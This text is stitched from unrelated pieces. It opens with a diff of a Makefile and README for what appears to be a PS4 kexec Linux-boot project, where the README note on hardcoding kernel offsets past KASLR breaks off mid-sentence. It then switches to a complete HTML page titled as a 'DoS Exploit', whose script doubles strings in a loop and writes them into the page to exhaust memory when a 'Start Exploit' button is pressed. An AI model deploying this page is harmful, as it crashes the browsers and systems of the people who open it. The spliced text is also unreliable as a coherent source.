@@ -1,11 +1,8 @@
-ifdef DDO_NOT_REMAP_RWX
-DO_NOT_REMAP_RWX := -DDO_NOT_REMAP_RWX
-endif
-
-CFLAGS := -march=btver2 -masm=intel -std=gnu11 -ffreestanding -fno-common \
+CFLAGS=$(CFLAG)
+CFLAGS += -march=btver2 -masm=intel -std=gnu11 -ffreestanding -fno-common \
-fPIC -fomit-frame-pointer -nostdlib -nostdinc \
-fno-asynchronous-unwind-tables \
- -Os -Wall -Werror -Wl,--build-id=none,-T,kexec.ld,--nmagic $(DO_NOT_REMAP_RWX)
+ -Os -Wall -Werror -Wl,--build-id=none,-T,kexec.ld,--nmagic
SOURCES := kernel.c kexec.c linux_boot.c linux_thunk.S uart.c firmware.c
@@ -34,6 +34,14 @@ You may pass something other than NULL as `early_printf`. In that case, that
function will be used for debug output during early symbol resolution, before
printf is available.
+Since PS4 3.55(?), KASLR(Kernel Address Space Layout Randomization) is
+enabled by default, symtab also disappears in newer kernel, we have to
+hardcode offsets for some symbols. Currently we use the `early_printf`
+given by user to caculate the base address of kernel, then relocate all the
+symbols from the kernel base. You could enable this feature like...
<html>
<title>Not Enough Free System Memory DoS Exploit</title>
<head>
<script>
function dos()
{
var longunistring1 = unescape("%u4141%u4141");
var longunistring2 = unescape("%u4242%u4242");
var longunistring3 = unescape("%u4343%u4343");
var longunistring4 = unescape("%u4444%u4444");
var longunistring5 = unescape("%u4545%u4545");
var longunistring6 = unescape("%u4646%u4646");
var longunistring7 = unescape("%u4747%u4747");
for(i=0; i <= 950 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
longunistring5+=longunistring5;
longunistring6+=longunistring6;
longunistring7+=longunistring7;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
</script>
</head>
<body>
<input type="button" value="Start Exploit" onclick="dos();">
</body>
</html>